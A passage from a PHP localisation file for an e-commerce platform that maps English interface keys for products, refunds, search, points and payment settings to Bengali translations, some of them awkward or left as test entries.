লিঙ্কটি সরাসরি লিঙ্ক নয়', 'please_provide_valid_email' => 'ভ্যালিড ইমেল সরবরাহ করুন', 'please_provide_valid_email_address.' => 'ভ্যালিড ইমেল ঠিকানা সরবরাহ করুন।', 'please_provide_valid_email_or_phone_number' => 'ভ্যালিড ইমেল বা ফোন নম্বর সরবরাহ করুন', 'please_provide_valid_phone_number' => 'অনুগ্রহ করে ভ্যালিড ফোন নম্বর প্রদান করুন', 'please_select_a_payment_Methods' => 'একটি অর্থ পেমেন্ট পদ্ধতি নির্বাচন করুন', 'please_try_again_after_' => 'দয়া করে আবার চেষ্টা করুন', 'please_type_verify_code' => 'দয়া করে কোডটি টাইপ করুন', 'please_verify_that_its_you.' => 'দয়া করে যাচাই করুন যে এটি আপনার।', 'please_wait_for_new_code.' => 'নতুন কোডের জন্য অপেক্ষা করুন।', 'please_write_the_message' => 'মেসেজ লিখুন দয়া করে', 'point' => 'পয়েন্ট', 'point to wallet' => 'পয়েন্ট টু ওয়ালেট', 'point_can_earn_by_placing_order_or_referral' => 'পয়েন্ট অর্ডার বা রেফারেল রেখে উপার্জন করতে পারে', 'point_is_equal_to' => 'পয়েন্ট সমান', 'point_to_wallet' => 'পয়েন্ট টু ওয়ালেট', 'point_to_wallet_transfer_successfully' => 'সফলভাবে পয়েন্ট টু ওয়ালেট ট্রান্সফার', 'point_transaction_history' => 'পয়েন্ট ট্রান্সেকশন ইতিহাস', 'points_required_to_convert' => 'রূপান্তর করতে প্রয়োজনীয় পয়েন্ট', 'poor' => 'পুওর', 'popular_tags' => 'জনপ্রিয় ট্যাগ', 'popup_Banner' => 'পপআপ ব্যানার', 'popup_banner_form' => 'পপআপ ব্যানার ফর্ম', 'port' => 'বন্দর', 'pos' => 'POS', 'pos management' => 'POS ম্যানেজমেন্ট', 'pos_management' => 'POS ম্যানেজমেন্ট', 'pos_order' => 'POS অর্ডার', 'pos_orders' => 'POS অর্ডার', 'positive' => 'ইতিবাচক', 'positive_review' => 'ইতিবাচক রিভিউ', 'post_max_size' => 'সর্বোচ্চ আকার POS', 'preparing_Shipment' => 'শিপমেন্ট প্রস্তুত করুন', 'press' => 'প্রেস', 'press_Submit' => 'জমা দিন', 'previous' => 'আগে', 'previous_shipping_cost' => 'পূর্ববর্তী শিপিং ব্যয়', 'price' => 'দাম', 'price_comparisons' => 'দামের কম্পেয়ার', 'price_information' => 'দামের তথ্য', 'price_range' => 'মূল্য পরিসীমা', 'pricing_&_others' => 'মূল্য এন্ড অন্যান্য', 'primary_Color' => 'মৌলিক রঙ', 'primary_Light_Color' => 'প্রাথমিক হালকা রঙ', 'print' => 'ছাপা', 'print_Invoice' => 'প্রিন্ট ইনভয়েস', 'print__Invoice' => 'প্রিন্ট ইনভয়েস', 'print_invoice' => 'প্রিন্ট ইনভয়েস', 'priority' => 'অগ্রাধিকার', 'privacy_Policy' => 'প্রাইভেসি পলিসি', 'privacy_policy' => 'প্রাইভেসি পলিসি', 'privateKey' => 'প্রাইভেট কি', 'private_Key' => 'ব্যক্তিগত কী', 'problem' => 'সমস্যা', 'proceed' => 'অগ্রসর', 'proceed_payment' => 'অর্থ পেমেন্ট', 'proceed_shipping' => 'শিপিং এগিয়ে যান', 'proceed_to_checkout' => 'চেকআউট এগিয়ে যান', 'proceed_to_next' => 'পরবর্তী দিকে এগিয়ে যান', 'processed' => 'প্রসেসেড', 'processing' => 'প্রসেসিং', 'processing_order' => 'প্রসেসিং অর্ডার', 'product' => 'পণ্য', 'product ' => 'পণ্য', 'product 1' => 'পণ্য 1', 'product 2' => 'পণ্য 2', 'product 50%' => 'পণ্য 50%', 'product Name' => 'পণ্যের নাম', 'product Type' => 'পণ্যের ধরন', 'product added successfully' => 'পণ্য সফলভাবে যুক্ত হয়েছে', 'product compares' => 'পণ্য কম্পেয়ার করে', 'product management' => 'পণ্য ব্যবস্থাপনা', 'product stocks' => 'পণ্য স্টক', 'product tag' => 'পণ্য ট্যাগ', 'product সফলভাবে আপডেট করা হয়েছে৷!' => 'পণ্য সফলভাবে আপডেট হয়েছে!', 'product wise' => 'পণ্য ', 'product_Add' => 'পণ্য অ্যাড', 'product_Attributes' => 'পণ্য ফীচার', 'product_Bulk_Import' => 'পণ্য বাল্ক আমদানি', 'product_Discount' => 'পণ্য ছাড়', 'product_Edit' => 'পণ্য এডিট ', 'product_Edit dsf' => 'পণ্য এডিট ডিএসএফ', 'product_Image' => 'পণ্যের ছবি', 'product_Info' => 'পণ্যর ডিটেলস', 'product_List' => 'পণ্য তালিকা', 'product_Name' => 'পণ্যের নাম', 'product_Preview' => 'পণ্য পূর্বরূপ', 'product_Report' => 'পণ্য প্রতিবেদন', 'product_Reviews' => 'পণ্য রিভিউ', 'product_Section' => 'পণ্য ক্যাটাগরি', 'product_Setup' => 'পণ্য সেটআপ', 'product_Statistics' => 'পণ্য পরিসংখ্যান', 'product_Stock' => 'পণ্য স্টক', 'product_Table' => 'পণ্য টেবিল', 'product_Type' => 'পণ্যের ধরন', 'product_Unit_Price' => 'পণ্য ইউনিট মূল্য', 'product_Updated_Requests' => 'পণ্য আপডেট অনুরোধ', 'product_add' => 'পণ্য অ্যাড', 'product_added_successfully' => 'পণ্য সফলভাবে যুক্ত', 'product_already_added_in_cart' => 'পণ্য ইতিমধ্যে কার্টে যুক্ত', 'product_code_sku' => 'পণ্য কোড স্কু', 'product_comparison' => 'পণ্য কম্পেয়ার', 'product_details' => 'পণ্যের ডিটেলস', 'product_discount' => 'পণ্য ছাড়', 'product_dispatched' => 'পণ্য প্রেরণ', 'product_edit' => 'পণ্য এডিট ', 'product_has_been_remove_from_wishlist' => 'পণ্য উইশ লিস্ট থেকে সরানো হয়েছে', 'product_in_wishlist' => 'উইশ লিস্টয় পণ্য', 'product_info' => 'পণ্যর ডিটেলস', 'product_list' => 'পণ্য তালিকা', 'product_management' => 'পণ্য ব্যবস্থাপনা', 'product_must_be_approved' => 'পণ্য অবশ্যই অনুমোদিত হতে হবে', 'product_name' => 'পণ্যের নাম', 'product_name_not_found' => 'পণ্যের নাম পাওয়া যায় নি', 'product_not_available' => 'পণ্য এভেইল্যাবলে নয়', 'product_not_found' => 'পণ্য পাওয়া যায় নি', 'product_of_this_year' => 'এই বছরের পণ্য', 'product_on_delivery' => 'ডেলিভারি সময় পণ্য', 'product_price_&_stock' => 'পণ্য মূল্য এন্ড স্টক', 'product_quantity_can_not_be_less_than_0_!' => 'পণ্যের পরিমাণ 0 এর চেয়ে কম হতে পারে না!', 'product_quantity_can_not_be_zero_or_less_than_zero_in_cart' => 'পণ্যের পরিমাণ কার্টে শূন্য বা শূন্যের চেয়ে কম হতে পারে না', 'product_quantity_is_not_enough' => 'পণ্যের পরিমাণ যথেষ্ট নয়', 'product_quantity_is_not_enough!' => 'পণ্যের পরিমাণ যথেষ্ট নয়!', 'product_quantity_updated' => 'পণ্যের পরিমাণ আপডেট হয়েছে', 'product_quantity_updated_successfully!' => 'পণ্যের পরিমাণ সফলভাবে আপডেট হয়েছে!', 'product_refund_validity' => 'পণ্য রিফান্ডের ভ্যালিডিটি', 'product_removed_successfully' => 'পণ্য সফলভাবে সরানো হয়েছে', 'product_report' => 'পণ্য প্রতিবেদন', 'product_review' => 'পণ্য রিভিউ', 'product_review_not_available' => 'পণ্য রিভিউ এভেইল্যাবল নয়', 'product_setting' => 'পণ্য সেটিং', 'product_settings' => 'পণ্য সেটিংস', 'product_sku' => 'পণ্য স্কু', 'product_stock' => 'পণ্য স্টক', 'product_table' => 'পণ্য টেবিল', 'product_thumbnail' => 'পণ্য থাম্বনেইল', 'product_type' => 'পণ্যের ধরন', 'product_updated_successfully' => 'পণ্য সফলভাবে আপডেট হয়েছে', 'product_variation_setup' => 'পণ্যের ভ্যারিয়েশন সেটআপ', 'product_video' => 'পণ্যের ভিডিও', 'product_wise' => 'পণ্য ', 'product_wise_discounted_amount_will_be_shown_here' => 'পণ্য অনুসারে ছাড়ের পরিমাণ এখানে দেখানো হবে', 'product_wise_shipping_cost' => 'পণ্য অনুসারে শিপিং ব্যয়', 'product_wise_shipping_cost_approval' => 'পণ্য অনুসারে শিপিং ব্যয় অনুমোদন', 'products' => 'পণ্য', 'profile' => 'প্রোফাইল', 'profile_Image' => 'প্রোফাইল ছবি', 'profile_Info' => 'প্রোফাইল তথ্য', 'profile_Settings' => 'প্রোফাইল সেটিংস', 'profile_id' => 'প্রোফাইল আইডি', 'profile_info' => 'প্রোফাইল তথ্য', 'promo_banner_bottom' => 'প্রোমো ব্যানার নীচে', 'promo_banner_left' => 'প্রোমো ব্যানার চলে গেছে', 'promo_banner_middle_bottom' => 'প্রোমো ব্যানার মাজের নীচে', 'promo_banner_middle_top' => 'প্রোমো ব্যানার মধ্য শীর্ষ', 'promo_banner_right' => 'প্রোমো ব্যানার রাইট', 'promotion management' => 'প্রচার ব্যবস্থাপনা', 'promotion_management' => 'প্রচার ব্যবস্থাপনা', 'promotional_Banners' => 'প্রচারমূলক ব্যানার', 'provide' => 'সরবরাহ করুন', 'provide phone number & press' => 'ফোন নম্বর প্রদান করুন এন্ড প্রেস', 'provide the' => 'সরবরাহ করুন', 'provide_Primary_Email_and_press' => 'প্রাথমিক ইমেল এন্ড প্রেস', 'provide_a_WhatsApp_number_without_country_code' => 'দেশের কোড ছাড়াই একটি হোয়াটসঅ্যাপ নম্বর সরবরাহ করুন', 'provide_the' => 'সরবরাহ করুন', 'provide_your_otp_and_proceed' => 'আপনার otp প্রদান করুন এবং এগিয়ে যান', 'public' => 'জনসাধারণ', 'publicKey' => 'পাবলিককি', 'public_Key' => 'পাবলিক কী', 'publish' => 'প্রকাশ', 'published' => 'প্রকাশিত', 'published_key' => 'প্রকাশিত কী', 'puma' => 'পুমা', 'purchase_code' => 'ক্রয় কোড', 'purchase_price' => 'ক্রয় মূল্য', 'purchase_price ($)' => 'ক্রয় মূল্য ($)', 'purchese_price' => 'ক্রয় দাম', 'push_Notification' => 'পুশ নোটিফিকেশন', 'push_Notification_Setup' => 'নোটিফিকেশন সেটআপ পুশ করুন', 'push_notification' => 'পুশ নোটিফিকেশন', 'push_notification_table' => 'পুশ নোটিফিকেশন টেবিল ', 'put_a_description_and_also_identifier_(identifier that used for app)_and_this_is_the' => 'একটি বর্ণনা রাখুন এন্ড সনাক্তকারী (আইডেন্টিফায়ার যা অ্যাপের জন্য ব্যবহৃত) এন্ড এটি হল', 'qty' => 'পরিমান', 'quantity' => 'পরিমাণ', 'quantity_sort_by_(high_to_low)' => 'পরিমাণ বাছাই (উচ্চ থেকে নিম্ন)', 'quantity_sort_by_(low_to_high)' => 'পরিমাণ বাছাই (নিম্ন থেকে উচ্চ) দ্বারা', 'quantity_update' => 'পরিমাণ আপডেট', 'question' => 'Question', 'quick_links' => 'দ্রুত লিঙ্ক', 'quick_view' => 'তারাতারি দেখা', 'qwert' => 'কিউয়ার্ট', 'range' => 'পরিসীমা', 'ranking' => 'Ranking', 'rating' => 'রেটিং', 'rating_High_to_Low' => 'উচ্চ থেকে কম রেটিং', 'rating_Low_to_High' => 'রেটিং কম থেকে উচ্চ', 'ratings' => 'রেটিং', 'ratio' => 'অনুপাত', 'ratio 1:1' => 'অনুপাত 1:1', 'ratio 1= 1 ' => 'অনুপাত 1=> 1', 'razor_pay' => 'razor ay', 're' => 'পুনঃ', 'reCAPTCHA Type' => 'Recaptcha প্রকার', 'reCAPTCHA_is_now_enabled_for_added_security.Users_may_be_prompted_to_complete_a_reCAPTCHA_challenge_to_verify_their_human_identity_and protect_against_spam_and_malicious_activity' => 'ReCAPTCHA এখন অতিরিক্ত নিরাপত্তার জন্য সক্ষম করা হয়েছে৷ ব্যবহারকারীদের তাদের মানব পরিচয় যাচাই করতে এন্ড স্প্যাম এন্ড দূষিত কার্যকলাপ থেকে রক্ষা করার জন্য একটি reCAPTCHA চ্যালেঞ্জ সম্পূর্ণ করার জন্য অনুরোধ করা হতে পারে', 'reCaptcha' => 'Recaptcha', 'reCaptcha Setup' => 'Recaptcha সেটআপ', 'reCaptcha credential Set up Instructions' => 'রিকাপ্টচা ক্রেডেনটিয়াল সেট আপ নির্দেশাবলী', 'reCaptcha_Setup' => 'Recaptcha সেটআপ', 'reached_maximum' => 'সর্বাধিক পৌঁছেছে', 'read_Before_Change_Theme' => 'থিম পরিবর্তন করার আগে পড়ুন', 'read_documentation' => 'ডকুমেন্টেশন পড়ুন', 'read_instructions' => 'নির্দেশাবলী পড়ুন', 'read_more' => 'আরও পড়ুন', 'ready_After_Sell' => 'বিক্রয় পরে প্রস্তুত', 'ready_Product' => 'প্রস্তুত পণ্য', 'ready_product_upload' => 'প্রস্তুত পণ্য আপলোড', 'ready_to_Leave' => 'ত্যাগ করতে প্রস্তুত', 'recaptcha' => 'Recaptcha', 'received_by' => 'গ্রহণকারী', 'receiver_info' => 'রিসিভার তথ্য', 'recommended' => 'প্রস্তাবিত', 'recommended_for_you' => 'আপনার জন্য প্রস্তাবিত', 'recommended_product' => 'প্রস্তাবিত পণ্য', 'recurring' => 'পুনরাবৃত্তি', 'redirecting_to_the_payment' => 'অর্থ পেমেন্ট পুনর্নির্দেশ', 'refer_&_Earn' => 'রেফার এন্ড উপার্জন করুন', 'refer_&_earn' => 'রেফার এন্ড উপার্জন করুন', 'refer_code' => 'কোড উল্লেখ করুন', 'reference' => 'রেফারেন্স', 'reference_Code' => 'রেফারেন্স কোড', 'refund' => 'রিফান্ড', 'refund policy' => 'রিফান্ড পলিসি', 'refund requests' => 'রিফান্ড অনুরোধ', 'refund statuses' => 'রিফান্ড স্ট্যাটাস', 'refund transactions' => 'রিফান্ড ট্রান্সেকশন', 'refund-policy' => 'রিফান্ড পলিসি', 'refund_Given' => 'রিফান্ড দেওয়া হয়েছে', 'refund_Policy' => 'রিফান্ড পলিসি', 'refund_Rate' => 'রিফান্ড হার', 'refund_Request_List' => 'রিফান্ডের অনুরোধ তালিকা', 'refund_Requests' => 'রিফান্ড অনুরোধ', 'refund_Transactions' => 'রিফান্ড ট্রান্সেকশন', 'refund_approved' => 'রিফান্ড অনুমোদিত', 'refund_day_limit_updated!!' => 'রিফান্ডের দিনের সীমা আপডেট হয়েছে !!', 'refund_details' => 'রিফান্ডের ডিটেলস', 'refund_given' => 'রিফান্ড দেওয়া হয়েছে', 'refund_id' => 'রিফান্ড আইডি', 'refund_list' => 'রিফান্ড তালিকা', 'refund_management' => 'রিফান্ড ব্যবস্থাপনা', 'refund_order' => 'রিফান্ড অর্ডার', 'refund_order_validity' => 'রিফান্ড অর্ডার ভ্যালিডিটি', 'refund_pending' => 'রিফান্ড পেন্ডিং', 'refund_placed_successfully' => 'রিফান্ড সফলভাবে প্লেস হয়েছে', 'refund_policy' => 'রিফান্ড পলিসি', 'refund_reason' => 'রিফান্ড কারণ', 'refund_refunded' => 'রিফান্ড রিফান্ড', 'refund_rejected' => 'রিফান্ড প্রত্যাখ্যান', 'refund_request' => 'টাকা রিফান্ড অনুরোধ', 'refund_request_after_order_within' => 'অর্ডারের পরে রিফান্ডের অনুরোধ', 'refund_request_canceled_message' => 'রিফান্ড অনুরোধ ক্যানসেল মেসেজ', 'refund_request_day_limit' => 'রিফান্ড অনুরোধের দিন সীমা', 'refund_request_id' => 'রিফান্ড অনুরোধ আইডি', 'refund_request_list' => 'রিফান্ডের অনুরোধ তালিকা', 'refund_request_time_limit' => 'রিফান্ড অনুরোধ সময় সীমা', 'refund_requested_successful!!' => 'রিফান্ড সফলভাবে অনুরোধ !!', 'refund_requests' => 'রিফান্ড অনুরোধ', 'refund_reson' => 'রিফান্ড কারণ', 'refund_settings' => 'রিফান্ড সেটিংস', 'refund_setup' => 'রিফান্ড সেটআপ', 'refund_status' => 'রিফান্ডের স্ট্যাটাস', 'refund_status_change_log' => 'রিফান্ড স্ট্যাটাস পরিবর্তন লগ', 'refund_status_changed_log' => 'রিফান্ডের স্ট্যাটাস পরিবর্তন লগ', 'refund_status_updated!!' => 'রিফান্ডের স্ট্যাটাস আপডেট হয়েছে !!', 'refund_status_updated_successfully!!' => 'রিফান্ডের স্ট্যাটাস সফলভাবে আপডেট হয়েছে !!', 'refund_to_wallet' => 'ওয়ালেট রিফান্ড', 'refund_to_wallet_hint' => 'ওয়ালেট রিফান্ড হিন্ট', 'refund_transaction_table' => 'রিফান্ড ট্রান্সেকশনের টেবিল ', 'refund_transactions' => 'রিফান্ড ট্রান্সেকশন', 'refunded' => 'রিফান্ড দেওয়া', 'refunded status can not be changed!!' => 'রিফান্ড স্ট্যাটাস পরিবর্তন করা যায় না !!', 'refunded status can not be changed!! Admin already change the statusapproved!!' => 'রিফান্ড স্ট্যাটাস পরিবর্তন করা যায় না !! অ্যাডমিন ইতিমধ্যে স্ট্যাটাস পরিবর্তন করেছেন !!', 'refunded status can not be changed!! Admin already changed the status :rejected!!' => 'রিফান্ড স্ট্যাটাস পরিবর্তন করা যায় না !! অ্যাডমিন ইতিমধ্যে স্ট্যাটাস পরিবর্তন করেছে: প্রত্যাখ্যান !!', 'refunded status can not be changed!! Admin already changed the status = approved!!' => 'রিফান্ড স্ট্যাটাস পরিবর্তন করা যায় না !! অ্যাডমিন ইতিমধ্যে স্ট্যাটাস পরিবর্তন করেছেন=> অনুমোদিত !!', 'register' => 'নিবন্ধন', 'register_control_your_order' => 'আপনার অর্ডার নিয়ন্ত্রণ করুন নিবন্ধন করুন', 'register_control_your_order.' => 'আপনার অর্ডার নিয়ন্ত্রণ করুন নিবন্ধন করুন।', 'registration_success_login_now' => 'নিবন্ধকরণ সফল এখন লগইন', 'regular wear' => 'নিয়মিত পরিধান', 'reject' => 'প্রত্যাখ্যান', 'rejected' => 'প্রত্যাখ্যাত', 'rejected_note' => 'প্রত্যাখ্যান নোট', 'rejected_reason' => 'প্রত্যাখ্যান কারণ', 'releans_sms' => 'রিলিন এসএমএস', 'remaining_balance' => 'অবশিষ্ট জমা খরচ', 'remember_me' => 'রিমেম্বার মি', 'remove' => 'অপসারণ', 'remove_all' => 'সব মুছে ফেলুন', 'rename_company' => 'নামকরণ সংস্থা', 'rename_your_website' => 'আপনার ওয়েবসাইটের নাম পরিবর্তন করুন', 'reorder' => 'পুনরায় অর্ডার', 'repeat' => 'পুনরাবৃত্তি', 'repeat_password' => 'পুনরাবৃত্তি পাসওয়ার্ড', 'repeat_password_not_match' => 'পুনরাবৃত্তি পাসওয়ার্ড মেলে না', 'reply' => 'উত্তর', 'report' => 'রিপোর্ট', 'reports' => 'রিপোর্ট', 'reports_&_Analysis' => 'প্রতিবেদন এন্ড বিশ্লেষণ', 'reports_and_analytics' => 'প্রতিবেদন এন্ড বিশ্লেষণ', 'request' => 'অনুরোধ', 'request_time' => 'অনুরোধ সময়', 'required_Info_From_Customer' => 'গ্রাহক থেকে প্রয়োজনীয় তথ্য', 'required_Information_from_Customer' => 'গ্রাহকের কাছ থেকে প্রয়োজনীয় তথ্য', 'reschedule' => 'পুনঃনির্ধারিত', 'resend' => 'পুনরায় পাঠানো', 'resend_OTP' => 'ওটিপি পুনরায় প্রেরণ করুন', 'resend_code_within' => 'মধ্যে কোড পুনরায় পাঠানো', 'resend_notification' => 'পুনরায় প্রেরণ নোটিফিকেশন', 'reset' => 'রিসেট', 'resource_type' => 'রিসোর্স টাইপ', 'responsibility' => 'দায়িত্ব', 'restaurant' => 'রেঁস্তোরা', 'resubmit' => 'পুনরায় জমা', 'resume' => 'পুনরায় শুরু', 'return policy' => 'রিটার্ন পলিসি', 'return-policy' => 'রিটার্ন পলিসি', 'return_Policy' => 'রিটার্ন পলিসি', 'return_policy' => 'রিটার্ন পলিসি', 'returned' => 'রিটার্নড', 'returned_orders' => 'রিটার্নড অর্ডার', 'reund_requests' => 'পুনরায় অনুরোধ', 'review' => 'রিভিউ', 'review_List' => 'রিভিউ তালিকা', 'review_list' => 'রিভিউ তালিকা', 'review_table' => 'রিভিউ টেবিল', 'reviewer' => 'পর্যালোচক', 'reviews' => 'রিভিউ', 'right' => 'ঠিক আছে', 'role' => 'ভূমিকা', 'role_form' => 'ভূমিকা ফর্ম', 'role_name' => 'নাম ভূমিকা', 'role_name_is_required' => 'ভূমিকার নাম প্রয়োজন', 'roles_table' => 'ভূমিকার টেবিল', 'root' => 'মূল', 'rtgr' => 'আরটিজিআর', 'safe_Payment' => 'নিরাপদ অর্থ পেমেন্ট', 'safe_payment' => 'নিরাপদ অর্থ পেমেন্ট', 'sale' => 'বিক্রয়', 'sale_report' => 'বিক্রয় প্রতিবেদন', 'sales' => 'বিক্রয়', 'sales_&_Transaction_Report' => 'বিক্রয় ও ট্রান্সেকশন প্রতিবেদন', 'sales_Commission' => 'বিক্রয় কমিশন', 'same' => 'একই', 'same_as_delivery_address' => 'ডেলিভারি ঠিকানা একাউন্টে একই', 'same_as_shipping_address' => 'বাজারের ঠিকানা', 'sandbox' => 'স্যান্ডবক্স', 'save' => 'সেভ', 'save_Changes' => 'পরিবর্তনগুলোর সংরক্ষন', 'save_changes' => 'পরিবর্তনগুলোর সংরক্ষন', 'save_information' => 'তথ্য সেভ করুন', 'save_informtion' => 'তথ্য সেভ করুন', 'save_the_settings' => 'সেটিংস সেভ করুন', 'save_this_Address' => 'এই ঠিকানা সেভ করুন', 'save_this_address' => 'এই ঠিকানা সেভ করুন', 'saved_addresses' => 'সেভ ঠিকানা', 'search' => 'সার্চ', 'search functions' => 'সার্চ ফাংশন', 'search...' => 'সার্চ ...', 'search_Brands' => 'ব্র্যান্ড সার্চ', 'search_By_Order_Id' => 'অর্ডার আইডি দ্বারা সার্চ করুন', 'search_Method_Name' => 'পদ্ধতির নাম সার্চ করুন', 'search_Product_Name' => 'পণ্যের নাম সার্চ করুন', 'search_Ticket_by_Subject_or_status' => 'বিষয় বা স্ট্যাটাস অনুসারে টিকিট সার্চ করুন', 'search_brand' => 'সার্চ ব্র্যান্ড', 'search_by_Attribute_Name' => 'এট্রিবিউট নাম দ্বারা সার্চ করুন', 'search_by_Banner_Type' => 'ব্যানার প্রকার দ্বারা সার্চ করুন', 'search_by_ID_or_name' => 'আইডি বা নাম দ্বারা সার্চ করুন', 'search_by_Name_or_Category' => 'নাম বা ক্যাটাগরি দ্বারা সার্চ করুন', 'search_by_Name_or_Email_or_Phone' => 'নাম বা ইমেল বা ফোন দ্বারা সার্চ করুন', 'search_by_Name_or_Mobile_No_or_Email' => 'নাম বা মোবাইল নং বা ইমেল দ্বারা সার্চ করুন', 'search_by_Name_or_Phone_or_Email' => 'নাম বা ফোন বা ইমেল দ্বারা সার্চ করুন', 'search_by_Order_ID' => 'অর্ডার আইডি দ্বারা সার্চ করুন', 'search_by_Order_ID_or_Transaction_ID' => 'অর্ডার আইডি বা ট্রান্সেকশন আইডি দ্বারা সার্চ করুন', 'search_by_Product_Name' => 'পণ্যের নাম অনুসারে সার্চ করুন', 'search_by_Product_or_Customer' => 'পণ্য বা গ্রাহক দ্বারা সার্চ করুন', 'search_by_Title' => 'শিরোনাম দ্বারা সার্চ', 'search_by_Title_or_Code_or_Discount_Type' => 'শিরোনাম বা কোড বা ছাড়ের ধরণ দ্বারা সার্চ করুন', 'search_by_brands' => 'ব্র্যান্ড দ্বারা সার্চ করুন', 'search_by_email' => 'ইমেলের মাধ্যমে সার্চ করুন', 'search_by_name' => 'নাম দ্বারা সার্চ', 'search_by_name_or_category' => 'নাম বা ক্যাটাগরি দ্বারা সার্চ করুন', 'search_by_name_or_email_or_phone' => 'নাম বা ইমেল বা ফোন দ্বারা সার্চ করুন', 'search_by_name_oremail_or_phone' => 'নাম ওরেমেল বা ফোনে সার্চ করুন', 'search_by_order_ID' => 'অর্ডার আইডি দ্বারা সার্চ করুন', 'search_by_order_id' => 'অর্ডার আইডি দ্বারা সার্চ করুন', 'search_by_order_id_or_refund_id' => 'অর্ডার আইডি বা রিফান্ড আইডি দ্বারা সার্চ করুন', 'search_by_orders_id' => 'অর্ডার আইডি দ্বারা সার্চ করুন', 'search_by_orders_id_or_refund_id' => 'অর্ডার আইডি বা রিফান্ড আইডি দ্বারা সার্চ করুন', 'search_by_orders_id_or_transaction_ID' => 'অর্ডার আইডি বা ট্রান্সেকশন আইডি দ্বারা সার্চ করুন', 'search_by_orders_id_or_transaction_id' => 'অর্ডার আইডি বা ট্রান্সেকশন আইডি দ্বারা সার্চ করুন', 'search_by_product_name' => 'পণ্যের নাম অনুসারে সার্চ করুন', 'search_by_title' => 'শিরোনাম দ্বারা সার্চ', 'search_customers' => 'গ্রাহকদের সার্চ করুন', 'search_data' => 'ডেটা সার্চ করুন', 'search_for_items_or_store' => 'আইটেম বা স্টোর সার্চ করুন', 'search_here' => 'এখানে সার্চ করুন', 'search_menu' => 'মেনু সার্চ করুন', 'search_orders' => 'অর্ডার সার্চ', 'search_product_name' => 'পণ্যের নাম সার্চ করুন', 'search_products' => 'সার্চ পণ্য', 'search_products_from_this_store' => 'এই স্টোর থেকে পণ্য সার্চ করুন', 'search_role' => 'সার্চ ভূমিকা', 'search_store' => 'সার্চ স্টোর', 'search_tags' => 'সার্চ ট্যাগ', 'search_your_location_here' => 'আপনার লোকেশন এখানে সার্চ করুন', 'sec' => 'সেকেন্ড', 'second_step' => 'দ্বিতীয় ধাপ', 'secondary_Color' => 'গৌণ রঙ', 'secondary_banner_form' => 'মাধ্যমিক ব্যানার ফর্ম', 'seconds' => 'সেকেন্ড', 'secret' => 'গোপন', 'secretKey' => 'সিক্রেট কী', 'secret_Key' => 'সিক্রেট কী', 'secret_key' => 'সিক্রেট কী', 'secured_information' => 'সুরক্ষিত তথ্য', 'security_code' => 'নিরাপত্তা কোড', 'security_key' => 'Security key', 'see_Credential_Setup_Instructions' => 'ক্রেডেনটিয়াল সেটআপ নির্দেশাবলী দেখুন', 'see_More' => 'আরো দেখুন', 'see_all' => 'সবগুলো দেখ', 'see_all_products' => 'সমস্ত পণ্য দেখুন', 'see_less' => 'কম দেখুন', 'see_more' => 'আরো দেখুন', 'see_the_latest_deals_and_exciting_new_offers' => 'সর্বশেষতম ডিল এন্ড উত্তেজনাপূর্ণ নতুন অফারগুলি দেখুন', 'select' => 'নির্বাচন করুন', 'select minimum one box' => 'সর্বনিম্ন একটি বাক্স নির্বাচন করুন', 'select_Brand' => 'ব্র্যান্ড নির্বাচন করুন', 'select_Coupon_Type' => 'কুপন প্রকার নির্বাচন করুন', 'select_Date_Range' => 'তারিখের পরিসীমা নির্বাচন করুন', 'select_Logout_below_if_you_are_ready_to_end_your_current_session' => 'আপনি যদি আপনার বর্তমান সেশনটি শেষ করতে প্রস্তুত হন তবে নীচে লগআউট নির্বাচন করুন', 'select_Payment_Method' => 'পেমেন্ট পদ্ধতি নির্বাচন করুন', 'select_Product' => 'পণ্য নির্বাচন করুন', 'select_Sub_Category' => 'সাব ক্যাটাগরি নির্বাচন করুন', 'select_Sub_Sub_Category' => 'সাব সাব ক্যাটাগরি নির্বাচন করুন', 'select_a_payment_method first' => 'প্রথমে একটি অর্থ পেমেন্ট পদ্ধতি নির্বাচন করুন', 'select_an_app_type_and_press' => 'একটি অ্যাপ্লিকেশন প্রকার নির্বাচন করুন এন্ড প্রেস', 'select_app_IDs' => 'অ্যাপ্লিকেশন আইডি নির্বাচন করুন', 'select_attributes' => 'ফীচার নির্বাচন করুন', 'select_brand' => 'ব্র্যান্ড নির্বাচন করুন', 'select_category' => 'ক্যাটাগরি নির্বাচন করুন', 'select_colors' => 'রঙ নির্বাচন করুন', 'select_country' => 'দেশ নির্বাচন করুন', 'select_coupon_bearer' => 'কুপন বহনকারী নির্বাচন করুন', 'select_coupon_type' => 'কুপন প্রকার নির্বাচন করুন', 'select_customer' => 'গ্রাহক নির্বাচন করুন', 'select_customer_is_required' => 'গ্রাহক নির্বাচন করা প্রয়োজন', 'select_customer_is_required!' => 'নির্বাচন করুন গ্রাহক প্রয়োজন!', 'select_date_range' => 'তারিখের পরিসীমা নির্বাচন করুন', 'select_from_saved' => 'সেভ থেকে নির্বাচন করুন', 'select_identify_type' => 'সনাক্তকরণের ধরন নির্বাচন করুন', 'select_minimum_one_selection_box' => 'সর্বনিম্ন একটি নির্বাচন বাক্স নির্বাচন করুন', 'select_payment_method' => 'পেমেন্ট পদ্ধতি নির্বাচন করুন', 'select_product' => 'পণ্য নির্বাচন করুন', 'select_reCAPTCHA_v2_as_ReCAPTCHA_Type' => 'Recaptcha v2 নির্বাচন করুন recaptcha প্রকার একাউন্টে', 'select_seller' => 'বিক্রেতা নির্বাচন করুন', 'select_seller_is_required' => 'বিক্রেতা নির্বাচন প্রয়োজন', 'select_seller_is_required!' => 'নির্বাচন বিক্রেতা প্রয়োজন!', 'select_service_IDs' => 'পরিষেবা আইডি নির্বাচন করুন', 'select_shipping_method_first' => 'প্রথমে শিপিং পদ্ধতি নির্বাচন করুন', 'select_status' => 'স্ট্যাটাস নির্বাচন করুন', 'select_sub_type' => 'সাব টাইপ নির্বাচন করুন', 'select_subcategory' => 'সাব ক্যাটাগরি নির্বাচন করুন', 'select_the' => 'নির্বাচন করুন', 'select_theme' => 'থিম নির্বাচন কর', 'select_transaction_type' => 'ট্রান্সেকশন ধরণ নির্বাচন করুন', 'select_variation' => 'বৈচিত্র নির্বাচন করুন', 'select_your_desire_category.' => 'আপনার ইচ্ছা ক্যাটাগরি নির্বাচন করুন।', 'select_your_theme' => 'আপনার থিম নির্বাচন করুন', 'selected' => 'নির্বাচিত', 'self_delivery' => 'স্ব ডেলিভারি', 'self_product' => 'স্ব পণ্য', 'sell_Digital_product' => 'ডিজিটাল পণ্য বিক্রয়', 'sell_on' => 'বিক্রয়', 'seller' => 'বিক্রেতা', 'seller added successfully' => 'বিক্রেতা সফলভাবে যোগ করেছেন', 'seller product test' => 'বিক্রেতা পণ্য চেক', 'seller shipping' => 'বিক্রেতা 